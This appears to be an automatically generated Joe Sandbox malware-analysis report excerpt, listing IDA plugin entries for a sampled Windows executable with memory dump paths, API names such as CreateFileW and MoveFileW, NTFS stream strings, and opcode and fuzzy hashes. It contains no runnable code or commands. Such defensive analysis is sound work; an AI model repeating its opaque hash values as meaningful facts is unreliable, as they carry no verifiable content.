                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: memcpy_s
                                      • String ID:
                                      • API String ID: 1502251526-0
                                      • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                      • Instruction ID: 864251893c04142937c8b687c11a188bf635dd022c9d031e65ffbe79929bc785
                                      • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                      • Instruction Fuzzy Hash: B8D19432B196868BDB64CF55E28466AB791FB98748F188134DB4EE7B44DF3CE845CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorFormatFreeLastLocalMessage
                                      • String ID:
                                      • API String ID: 1365068426-0
                                      • Opcode ID: a3eefe559d296bd36c1cae37cf4e1e300267d0d32691df0dd3a6d40942d78c6b
                                      • Instruction ID: b5100b73659d7dea7007d7f5b6dd1614ecdc6f2559eaf43478e46366653578a8
                                      • Opcode Fuzzy Hash: a3eefe559d296bd36c1cae37cf4e1e300267d0d32691df0dd3a6d40942d78c6b
                                      • Instruction Fuzzy Hash: 21012C7160874286E6108F66F85117AA791BF8ABC8F084074EA4DD7B85DE3CE5058700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: 2fd9fb95ed6a4284651077151a4f0b6093c6589f12268630e25181bc308688a6
                                      • Instruction ID: 27d810b8a8229d4221bdd27f2d7624dfa52e78bca2201e2369cdf401ef826d2d
                                      • Opcode Fuzzy Hash: 2fd9fb95ed6a4284651077151a4f0b6093c6589f12268630e25181bc308688a6
                                      • Instruction Fuzzy Hash: 7A31E922B1569245FB209F36A8057B97A91AF45BE8F188275DE6CD7BC6CE3CD5058300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise_clrfp
                                      • String ID:
                                      • API String ID: 15204871-0
                                      • Opcode ID: dd850569bf3cdd24e5cff22b07788c07adbe1485687e236f21ba57eb0d1323aa
                                      • Instruction ID: fb1ba492b8755040135d3bc79c9396cadd5bcf756ade78e32c5be789719d6d42
                                      • Opcode Fuzzy Hash: dd850569bf3cdd24e5cff22b07788c07adbe1485687e236f21ba57eb0d1323aa
                                      • Instruction Fuzzy Hash: 3BB14873604B898BEB15CF29C9863683BA0FB44B4CF188961DA5DD77A8CF39D495C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID:
                                      • API String ID: 1061551593-0
                                      • Opcode ID: 889094c01c96e48fc0bc8d6bac5bcd56f2ce6fd0cf7844abad017e09edda8be2
                                      • Instruction ID: 37e94ec9b0808d61397effb8c81451a20753f608cfcbd6477ddde16bea4a1f44
                                      • Opcode Fuzzy Hash: 889094c01c96e48fc0bc8d6bac5bcd56f2ce6fd0cf7844abad017e09edda8be2
                                      • Instruction Fuzzy Hash: 4881E936B18A058AEB10CF6AE4406AD7771FB88B88F544562DE0DE7B64DF38E649C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FormatInfoLocaleNumber
                                      • String ID:
                                      • API String ID: 2169056816-0
                                      • Opcode ID: d9124697dc7a8d84d5d498c11f979aef44ae65fa130e56fd134fc764616be2af
                                      • Instruction ID: 63385b34bdb6c593c8c29e4ec04dee2d7c273f9fbff6e29a8c3c195dc12c098e
                                      • Opcode Fuzzy Hash: d9124697dc7a8d84d5d498c11f979aef44ae65fa130e56fd134fc764616be2af
                                      • Instruction Fuzzy Hash: 3F116D32A19B8596E7618F61F4007E97761FF88B88F884175DA4DE3614DF3CD545C704
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF65A362480: CreateFileW.KERNELBASE ref: 00007FF65A36255B
                                        • Part of subcall function 00007FF65A362480: GetLastError.KERNEL32 ref: 00007FF65A36256E
                                        • Part of subcall function 00007FF65A362480: CreateFileW.KERNEL32 ref: 00007FF65A3625CE
                                        • Part of subcall function 00007FF65A362480: GetLastError.KERNEL32 ref: 00007FF65A3625D7
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A361588
                                        • Part of subcall function 00007FF65A363940: MoveFileW.KERNEL32 ref: 00007FF65A36397D
                                        • Part of subcall function 00007FF65A363940: MoveFileW.KERNEL32 ref: 00007FF65A3639F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 34527147-0
                                      • Opcode ID: 718b4ceb9e8928102439ddb9a4ad3df85beca7c7916738bc2119cc3b908d80fb
                                      • Instruction ID: 817feb734cc0d9b70489fd65f57c904e9fbbebb26f13e14823b5ba7e02fa72a6
                                      • Instruction Fuzzy Hash: 5D91AD22B28A4682EE10DF66D4442BE63A1FF94BC8F584072EE4EE7B95DE3CD545C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: 0845348443bdcef02aa75bae9a0381c53b3b081d4eec6718d375521dafbbd6da
                                      • Instruction ID: e5f4060e293f462799d709958655ce653472be626319d9eb58f8c18895f11b7c
                                      • Instruction Fuzzy Hash: 38018471D4D98689FA708720B5153B637919F5A30DF4C02F0C6AEE73A1CE3CA4448A08
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: 0
                                      • API String ID: 3215553584-4108050209
                                      • Opcode ID: 0bdc5fc199a0cdb7e5e4fe1bb73b5790fb45139705c0e0a4982304375264cdf5
                                      • Instruction ID: 11721fdc3b9582a7de2a60ef6197fbd33c024b7b5535d1598ffee60388adf898
                                      • Instruction Fuzzy Hash: FF810122A1B60346EBA88A25948067D6BE1EF41BCCF5C19B1DD09F779DCF2DE846D700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: 0
                                      • API String ID: 3215553584-4108050209
                                      • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                      • Instruction ID: 37fbc3fcd85e8a9be6dae084de1e4dcf6af22b340b7b92cfb77c6d55f115a3bd
                                      • Instruction Fuzzy Hash: 7A710821A1E28347FBB88A25908027E6FD19F817CCF1C15B5DD49F76D6CE2DE8468741
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: gj
                                      • API String ID: 0-4203073231
                                      • Opcode ID: 8e61a0345426cfbf98e966bfd6dd27ed2445dff38cff5604a39dc23a55b332d0
                                      • Instruction ID: 1157f35152211a4b853956c77b4d2417a25dc3b5dce30650eafbed1e0062a521
                                      • Instruction Fuzzy Hash: 6C5190377286908BD764CF25E400A9E73A5F788798F455126EF4A93B08CF39E945CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: c44f08b774434d1c2136fe748e04a0077f53503c1e88ff3ce48f42e5bcad7e07
                                      • Instruction ID: b40ca79c20cc711808507a3ab4e915b7fccbbc15d6651ca66a8594e4b3d6a060
                                      • Instruction Fuzzy Hash: 4341DE22715A5586EE48CF2AE9142A977A1AB58FD8B4D9032EF0DD7764EE3CD486C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 49e9b622a0bfff4a584b6ce6135862a2cc150116dd83739bda1dc6aafe13e0e1
                                      • Instruction ID: 5000616330be4f7be0f9984a1b4ca593f4cf8042bcd66b4338b66e85b4ee6483
                                      • Instruction Fuzzy Hash: 29B09224E17A06C6EA082F11AD8225822E9BF88704F9D80B9D10CE1320EE2C20A54700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 105ca43f00b5e57847d96d9c55c98dcead2d2fe65cfd248801b2ca2ada2e485a
                                      • Instruction ID: f21be2d3a1d64c566ba0fb39c9e19f8ee592d13b3d642073bf896d80ceee827e
                                      • Instruction Fuzzy Hash: 9682EFA3A096C1C6DB05CF28D4442BC7BA1EB55B88F0D817ACB8AD7385DE3DEA45D310
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                      • Instruction ID: 53e737057ac7d03e01db8ed9e911d1c46c3386a53056d22c63206b743cdf6447
                                      • Instruction Fuzzy Hash: 45627D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f0c1eca1490c6f524e8de29083b0d75a9f12f0148716ba9bc99da8edd74597df
                                      • Instruction ID: cd029c13226dc38cdba4f273918aba9fa15cf2adab2043ad99c6b7130a014c6d
                                      • Instruction Fuzzy Hash: 31821FB3A096C18AD768CF28C4446FC7BA1EB55B4CF198176CA4EE7785CE38DA85C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e191559d85294972c8b15a22cf3b400ae880c7d5fcdb58d6052d2ea93da585ac
                                      • Instruction ID: 9da414f075041bca9d2daeb4758a16a6454bc01e8d15717db0376ae28f8853b2
                                      • Instruction Fuzzy Hash: 2822F573B206508BD728CF25D89AE5E3766F798748B4B8228DF0ACB785DB38D505CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1f657be7e1f195e1cb0a077a2e8992a9c2316c08defb54c66119332128546ffa
                                      • Instruction ID: 232da43453fe49055bca242c7485b62975907a33eb53397a359ffb0603397656
                                      • Instruction Fuzzy Hash: B432BE72A086918BE71CCF24D550ABC37A1FB54B48F098179DB4AE7B88DF3CA955C780
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6472486f99e2931273e545462403043f1bf9b0b2859d16c20765bc74e3144e89
                                      • Instruction ID: c366f2ec36b89976784fc5f34979e26d703d8b5018a71ac0fc2a186a4df76b24
                                      • Instruction Fuzzy Hash: 68C1ACB7B281908FE350CF7AE400A9D3BB1F39878CB559125EF59A3B09D639E645CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d136bca7deb9820811996b1a273c16c67381898c9c8c0d7b5743e702d501d639
                                      • Instruction ID: 751adf6ad8f569ef17a550c07f00ad148b02e20fa9a8df86b85d2696d0a051f8
                                      • Instruction Fuzzy Hash: 7FA15373E0828286EB10CAA4D4447F96791EF9474CF1D41B5EA4EE7B82DE3CEA41C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da4b5c93971cda1c30e5eee4be8d9e04c4b4a48383b2ec9a90131c9e461bfd7c
                                      • Instruction ID: 6817cd5f3e160c42ddec03a53fcf124a4c4e7fe632fa9fadd1cbd073ddcaf4ce
                                      • Instruction Fuzzy Hash: 53C1F677A291E04DE302CBB5A4248FD3FF1E71E34DB4A4152EFA6A7B4AD5285201DF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      • API String ID: 190572456-0
                                      • Opcode ID: b509a7b9623e828e2f94f36bf10b171de2d5eb00cb1ca025cb199c8348f6ee71
                                      • Instruction ID: 7878ceb897d55f112daa60956d3f970abafe64fea99fb5e6518ecd06741d2dfb
                                      • Opcode Fuzzy Hash: b509a7b9623e828e2f94f36bf10b171de2d5eb00cb1ca025cb199c8348f6ee71
                                      • Instruction Fuzzy Hash: 47910E62A1858296EB11CF29E4056FD2761FF9978CF481031EF4EE7B59EE38E606C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ad0df4841f270bcfaeccc73dae356be3e63ef9d514f613fc5c919404c1519221
                                      • Instruction ID: 2a05b30542f4ff5dba213abbd1bc35bb1a7f8bce9f7c78ec3eff6bb9ad852a26
                                      • Opcode Fuzzy Hash: ad0df4841f270bcfaeccc73dae356be3e63ef9d514f613fc5c919404c1519221
                                      • Instruction Fuzzy Hash: 82812523B1875285EB10DB25E8446EE67A1FF8978CF484071DE4DE7B89DE38D506CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 037c072c8f69c730398842e9f14e44372f2237b347c4ac58ad4ad4a902201b6b
                                      • Instruction ID: 73eb86baee7e76ed6783833b460e6d2afbee3383736e75758949e6096a4031b0
                                      • Opcode Fuzzy Hash: 037c072c8f69c730398842e9f14e44372f2237b347c4ac58ad4ad4a902201b6b
                                      • Instruction Fuzzy Hash: 8461F122B181D549EB11CF7585104FD7FB1AB59788B4A80B2CF9AE3B46DE3CE506CB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4229b7833cb0a742bbdc932db99760edf63482b3b6f62e8612c8a0675b4b6c2
                                      • Instruction ID: 0a2e7960597564fba77b4ea3dfb4724ed8bdcdd25361b58025fa7916266ecf5b
                                      • Opcode Fuzzy Hash: b4229b7833cb0a742bbdc932db99760edf63482b3b6f62e8612c8a0675b4b6c2
                                      • Instruction Fuzzy Hash: 07511473B181918BE7588F68E5087793761FB94748F494134DB4AD7A88DE3DDA41CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 123e4387f8d9ae5451c15e5b2be3a6a791da4299fc8242df495a927e0fa62112
                                      • Instruction ID: b62a798ed234ae3e784c500cbb025a316df114c8742b0615d5139efc24826332
                                      • Opcode Fuzzy Hash: 123e4387f8d9ae5451c15e5b2be3a6a791da4299fc8242df495a927e0fa62112
                                      • Instruction Fuzzy Hash: 45312AB2A186828BDB59CE56E65027EB7D0FB45788F18813DDB4AD3B41DE3CE551CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                      • Instruction ID: a11f7eb30e3bcc9e984673293670ff9bf21858eaaad6e6d999bf7a28b6f25a0e
                                      • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                      • Instruction Fuzzy Hash: 39F0DA65F1CC2B42FB681C28981973910419F6139CF5C84B5D01FE77C1DCDDA8A1A129
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c35f8b18c1a0bfada156a295f3d949bbcba5d0e46cbbf7311c51e14de01b873
                                      • Instruction ID: 66c628bee180606d0f5f66142e5138243aae102121d86a491c581f8383b50eb9
                                      • Opcode Fuzzy Hash: 7c35f8b18c1a0bfada156a295f3d949bbcba5d0e46cbbf7311c51e14de01b873
                                      • Instruction Fuzzy Hash: 2EA0026590DC43E5E6548F05F9A10302734FF90318B4840B1F01DE11A4DF3CA400C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Memory Dump Source
                                       • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                       • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                      • API String ID: 3668304517-727060406
                                      • Opcode ID: d1f70ab6d0ae8b3084d51eef4787e874430d0504aa66550a33771c8389bfad96
                                      • Instruction ID: 2247045f70c8d46cf0669cbdb4306717219280e0f7ef71a58fe9e8f5b2015f9e
